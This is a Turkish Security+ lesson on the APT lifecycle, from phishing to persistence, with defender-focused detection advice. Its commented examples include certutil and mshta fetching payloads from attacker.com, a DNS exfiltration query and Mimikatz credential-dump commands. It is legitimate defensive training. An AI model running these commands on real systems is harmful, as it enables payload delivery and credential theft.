0Pricing
Security+ Academy · Ders

APT Yaşam Döngüsü: İlk Erişimden Kalıcılığa

Bir APT'nin hedefli kimlik avıyla ilk erişim sağlamasından C2 kurulmasına, ayrıcalık yükseltmesine ve yeniden başlatmalardan ve yeniden imaj oluşturmadan kurtulan kalıcılık mekanizmalarına kadar olan süreci izleyin.

APT Yaşam Döngüsü: İlk Erişimden Kalıcılığa, CoddyKit'te ücretsiz bir Security+ Academy dersidir. Bu, 4 dersinin 1. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Security+ Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Security+ Academy kursu toplamda 4 dersten oluşur.

Gelişmiş Kalıcı Tehdit Nedir?

Gelişmiş Kalıcı Tehdit (APT), genellikle ulus devlet aktörleri veya belirli stratejik hedeflere sahip, iyi finanse edilen suç grupları tarafından yürütülen, karmaşık ve uzun vadeli bir siber saldırı kampanyasıdır. Bu tehdidi tanımlayan üç özellik şunlardır: Gelişmiş — özel amaçlı kötü amaçlı yazılımlar, sıfırıncı gün açıkları ve yeni teknikler kullanır; Kalıcı — ani bir saldırı değil, aylar veya yıllar boyunca gizli varlığını sürdürür; Tehdit — belirli bir kuruluşa yönelik koordineli ve hedefli bir saldırıdır. Ünlü APT grupları arasında Rusya'nın GRU'suyla bağlantılı APT28 (Fancy Bear), Çin'le bağlantılı APT41 ve Kuzey Kore'yle bağlantılı Lazarus Group bulunur.

İlk Erişim: APT'ler Nasıl İçeri Girer?

APT kampanyaları genellikle kanıtlanmış az sayıdaki ilk erişim tekniğinden biriyle başlar. Silahlandırılmış ekler veya kimlik bilgilerini ele geçiren bağlantılar içeren hedefli kimlik avı en yaygın yöntemdir; e-posta, güvenilir bir çalışma arkadaşından veya iş ortağından geliyormuş gibi görünür. Tedarik zincirinin ele geçirilmesi (SolarWinds/SUNBURST olayında olduğu gibi), kötü amaçlı kodu güvenilir yazılım güncellemelerine ekler. İnternete açık hizmetlerin istismar edilmesi (VPN cihazları, Exchange sunucuları ve web uygulamaları), güncellenmemiş CVE'ler kullanılarak gerçekleştirilir. Su kuyusu saldırıları, hedef kuruluşun çalışanlarının sık ziyaret ettiği web sitelerini ele geçirir ve ziyaretçilere gezinme sırasında yararlanılan açıkları sunar.

Çalıştırma: İlk Yükün Çalıştırılması

İlk erişimi sağladıktan sonra saldırgan, hedef sistemdeki ilk yükünü çalıştırmalıdır. APT'ler normal sistem etkinliğiyle örtüşen teknikleri tercih eder: kurban içeriği etkinleştirdiğinde çalışan Office belgelerindeki kötü amaçlı makrolar; açıldığında betikleri çalıştıran HTML Application (HTA) dosyaları; uygulama izin listelerini aşarak saldırgan kodunu çalıştırmak için mshta.exe, certutil.exe, regsvr32.exe veya wscript.exe gibi meşru Windows araçlarının kullanıldığı Living-off-the-Land Binaries (LOLBins). Bu teknikler, ilk yükleri meşru sistem etkinliğinden ayırt etmeyi zorlaştırır.

# Example LOLBin abuse: certutil used to download payload
# certutil.exe -urlcache -split -f http://attacker.com/payload.exe payload.exe

# Example: mshta executing remote HTA
# mshta.exe http://attacker.com/malicious.hta

# Detection: alert on certutil/mshta with network connections

C2 Kurulumu: Eve Telefon Etme

İlk yük çalıştığında, saldırganın altyapısına geri bağlanan bir Komuta ve Kontrol (C2) kanalı kurar. Modern APT C2'si, algılanmaktan kaçınmak üzere tasarlanmış teknikler kullanır: meşru bulut hizmetlerini (Teams, OneDrive, GitHub) taklit eden benzer görünümlü alan adlarına HTTPS bağlantıları; normal DNS trafiği gibi görünen DNS TXT kayıt sorgularında komutların kodlandığı DNS tünelleme; bir başlangıç değerinden her gün yeni bir C2 alan adı üreten ve alan adı engellemeyi etkisiz kılan Alan Adı Üretme Algoritmaları (DGA'lar) ve iletişim kanalı olarak meşru bulut platformlarını (Slack API, Google Sheets, Twitter) kullanan living-off-the-land C2'si.

# DNS tunneling detection: look for unusually long DNS queries
# Normal DNS query: www.google.com (13 chars)
# DNS tunnel query: 4f72d3a1b9c2e5f8.exfil.attacker.com (38 chars of encoded data)

# Zeek/Bro detection rule concept:
# alert dns (dns.qname length > 50)

Keşif: Ortamın Haritasını Çıkarma

C2'yi kurduktan sonra APT aktörleri, ilerlemeden önce ortamı anlamak için iç keşif gerçekleştirir. Buna şunlar dahildir: güven ilişkilerini haritalamak ve yüksek değerli hedefleri belirlemek için BloodHound gibi araçları kullanarak Active Directory numaralandırması; etkin ana bilgisayarları, hizmetleri ve açık bağlantı noktalarını belirlemek için ağ taraması; yapılandırma dosyalarını, parola veritabanlarını veya tarayıcılarda saklanan kimlik bilgilerini bulmak üzere dosya sistemlerini arayarak kimlik bilgisi keşfi ve ayrıcalıklı hesapları, hizmet hesaplarını ve yönetici iş istasyonlarını belirlemek için kimlik numaralandırması. Keşif etkinliklerinin çoğunda algılanmaktan kaçınmak için yerel Windows araçları (net user /domain, ipconfig, nltest) kullanılır.

# Native Windows commands used by APTs for discovery
# net user /domain                    # list domain users
# net group 'Domain Admins' /domain   # list domain admins
# ipconfig /all                       # network configuration
# netstat -ano                        # active network connections
# tasklist /v                         # running processes

Ayrıcalık Yükseltme: Yönetici Yetkisi Elde Etme

APT'ler genellikle ilk erişimi sınırlı kullanıcı kimlik bilgileriyle elde eder ve hedeflerine ulaşmak için ayrıcalıkları yükseltmelidir. Yaygın yükseltme yolları şunlardır: Mimikatz kullanarak bellekten kimlik bilgisi hırsızlığı (NTLM özetlerinin LSASS işlem belleğinden çıkarılması); Kerberoasting (hizmet hesapları için hizmet biletleri isteme ve bunları çevrimdışı kırma); zayıf izinlere sahip yanlış yapılandırılmış hizmetleri istismar etme (güvensiz hizmet ikili dosyası yolları ve DLL ele geçirme) ve ayrıcalıklı bir işlemin kimlik doğrulama belirtecini çalmak için belirteç taklidi. User Account Control (UAC) atlatma teknikleri, UAC istemi göstermeden standart yönetici hesabından SYSTEM'e geçilmesini sağlar.

# Mimikatz: dump credentials from LSASS memory
# (defender perspective - what attackers run)
# privilege::debug
# sekurlsa::logonpasswords

# Detection: alert on LSASS memory reads by non-system processes
# Windows Event ID 4656/4663: access to LSASS process

Kalıcılık Mekanizmaları: Yeniden Başlatmalardan Sonra Hayatta Kalma

APT'ler, yeniden başlatmalardan ve yeniden görüntü oluşturmadan sonra da çalışan kalıcılık mekanizmalarına büyük yatırım yapar; çünkü ilk erişimi elde etmek zor ve maliyetli olmuş olabilir. Yaygın Windows kalıcılık teknikleri şunlardır: Registry Run Keys (HKLM\Software\Microsoft\Windows\CurrentVersion\Run); kötü amaçlı yazılımı düzenli bir zamanlamayla çalıştıran Scheduled Tasks; otomatik olarak başlatılan Windows Services; algılanması zor olan ve çoğu temizleme girişiminden sonra da varlığını sürdüren WMI Event Subscriptions; DLL Search Order Hijacking ve işletim sistemi yeniden kurulumlarından sonra da çalışan Boot/Pre-OS implantları (Equation Group/NSA bağlantılı aktörler tarafından kullanılan UEFI ürün yazılımı implantları).

# Common persistence locations to monitor
# Registry:
# HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# HKLM\System\CurrentControlSet\Services

# Check scheduled tasks for suspicious entries
# schtasks /query /fo LIST /v | findstr 'Task Name\|Run As User\|Task To Run'

Savunmadan Kaçınma: Herkesin Görebileceği Yerde Gizlenme

APT'ler, uç nokta güvenlik araçları ve analistler tarafından tespit edilmekten kaçınmak için kapsamlı savunmadan kaçınma yöntemleri kullanır. Teknikler arasında şunlar bulunur: süreç enjeksiyonu — kötü amaçlı kodun explorer.exe veya svchost.exe gibi meşru süreçlere enjekte edilmesi; böylece kötü amaçlı yazılımın güvenilir bir süreç adı altında çalışması; zaman damgası değiştirme — kötü amaçlı dosyaların yıllardır varmış gibi görünmesi için dosya zaman damgalarının değiştirilmesi; günlük silme ve değiştirme — kanıtları ortadan kaldırmak için Windows Event günlüklerinin temizlenmesi; kod imzalama sertifikalarının kötüye kullanılması — kötü amaçlı yazılımların çalınmış meşru sertifikalarla imzalanması ve dosya tabanlı AV'nin tespit edebileceği diske hiç yazılmayan bellek içi yürütme (dosyasız kötü amaçlı yazılım).

Veri Sızdırma: Verileri Gizlice Çalma

APT'ler, DLP denetimlerini ve bant genişliği anomali tespitini tetiklememek için veri sızdırmayı dikkatle yönetir. Teknikler arasında şunlar bulunur: veri hazırlama — hedeflenen verilerin günler boyunca küçük parçalar hâlinde sızdırılmadan önce şifrelenmiş bir arşivde toplanması; kurumsal güvenlik duvarı kurallarının izin verdiği bulut depolama hizmetlerine (OneDrive, Dropbox) HTTPS üzerinden veri sızdırma; steganografi — verilerin görüntü dosyalarının içine gizlenmesi ve meşru trafikle karışmak için zamana dayalı veri sızdırma işleminin mesai saatlerinde gerçekleştirilmesi. APT'ler her şeyi topluca kopyalamak yerine yalnızca ihtiyaç duydukları verileri (yüksek değerli fikrî mülkiyet, kimlik bilgileri ve stratejik planlar) sızdırır; böylece bıraktıkları iz ve tespit edilme olasılıkları en aza iner.

APT Faaliyetlerini Tespit Etme: Temel Göstergeler

APT tespiti, saldırı zinciri boyunca birbiriyle ilişkili faaliyetlerin örüntülerini belirlemek için tek tek uyarıların ötesine bakmayı gerektirir. Temel göstergeler şunlardır: alışılmadık üst-alt süreç ilişkileri (ör. Word'ün PowerShell başlatması); PowerShell kodlanmış komutları veya internetten yapılan indirmeler; alışılmadık zamanlarda oluşturulan zamanlanmış görevler veya hizmetler; sistem dışı süreçlerin LSASS belleğine erişmesi; iş istasyonlarından SMB veya WMI aracılığıyla gerçekleştirilen yatay hareket ve alt alan adı uzunlukları fazla olan alışılmadık giden DNS sorguları. MITRE ATT&CK Navigator, savunma ekiplerinin tespit edilen teknikleri ATT&CK matrisiyle eşleştirmesine ve tespit kapsamlarındaki boşlukları belirlemesine olanak tanır.

# Splunk query: detect PowerShell encoded command execution
# index=windows source=WinEventLog:Security EventCode=4688
# | search NewProcessName='*powershell*' CommandLine='*-enc*'
# | table _time, ComputerName, SubjectUserName, CommandLine

APT'ye Yanıt: Fark Ettirmeden Sınırlama

Etkin bir APT'ye yanıt vermek dikkatli bir denge gerektirir: saldırganı uyarmadan tehdidi sınırlamak. Erken sınırlama (C2 trafiğini engellemek, hesapları devre dışı bırakmak), APT'nin yok edici yükleri etkinleştirmesine veya veri sızdırmayı hızlandırmasına neden olabilir. En iyi uygulamalar şunlardır: istihbarat toplarken gizlice izleme; C2'yi engellemeden güvenlik duvarı kurallarını kullanarak bulaşmış ana bilgisayarları kademeli olarak segmentlere ayırma; saldırgan faaliyetlerini izlemek için aldatma teknolojilerini (bal küpleri, kanarya hesapları) devreye alma ve önemli sınırlama işlemlerinden önce kolluk kuvvetleriyle koordinasyon sağlama. Tam iyileştirme, tüm kalıcılık mekanizmalarının ve güvenliği ihlal edilmiş hesapların belirlenmesini gerektirir; gözden kaçırılan tek bir implant bile saldırganın geri dönmesi için yeterlidir.

Hızlı Kontrol

Bu derste ele alınan CompTIA Security+ (SY0-701) kavramlarını ne kadar anladığınızı sınayın.

Ders Özeti

Bu derste şunları öğrendiniz: APT'ler, genellikle aylar boyunca faaliyet gösteren gelişmiş, kalıcı ve hedefli kampanyalardır; ilk erişim için çoğunlukla hedefli kimlik avı, tedarik zinciri saldırıları veya güvenlik açığından yararlanma yöntemlerini kullanırlar. APT'ler, normal trafikle karışmak ve tespit edilmekten kaçınmak için C2 amacıyla LOLBin'leri ve meşru bulut hizmetlerini kullanır. Kalıcılık mekanizmaları, Registry Run Keys'ten UEFI ürün yazılımı implantlarına kadar çeşitlenir; WMI aboneliklerini tespit etmek ve düzeltmek özellikle zordur. Sıradaki bölümde Pass-the-Hash ve Pass-the-Ticket dâhil yatay hareket tekniklerini inceleyeceğiz.

Sıkça Sorulan Sorular

“APT Yaşam Döngüsü: İlk Erişimden Kalıcılığa” dersi ücretsiz mi?

Evet — “APT Yaşam Döngüsü: İlk Erişimden Kalıcılığa” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Security+ Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Security+ Academy kursu toplamda 4 dersten oluşur.

“APT Yaşam Döngüsü: İlk Erişimden Kalıcılığa” dersinde ne öğreneceğim?

Bir APT'nin hedefli kimlik avıyla ilk erişim sağlamasından C2 kurulmasına, ayrıcalık yükseltmesine ve yeniden başlatmalardan ve yeniden imaj oluşturmadan kurtulan kalıcılık mekanizmalarına kadar olan… Security+ Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.

Security+ Academy öğrenmeye başlamak için deneyim gerekli mi?

Önceden deneyim gerekmez. CoddyKit'te Security+ Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 1. dersidir.

“APT Yaşam Döngüsü: İlk Erişimden Kalıcılığa” dersi ne kadar sürer?

Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.

Bu Security+ Academy dersinde kod yazıp çalıştırabilir miyim?

Evet. Her Security+ Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.

Bu kursun tüm dersleri

  1. APT Yaşam Döngüsü: İlk Erişimden Kalıcılığa
  2. Yanal Hareket: Özet Geçirme ve Bilet Geçirme
  3. Kerberoasting ve Altın Bilet Saldırıları
  4. Tespit ve Müdahale için MITRE ATT&CK Çerçevesi
← Security+ Academy Sayfasına Dön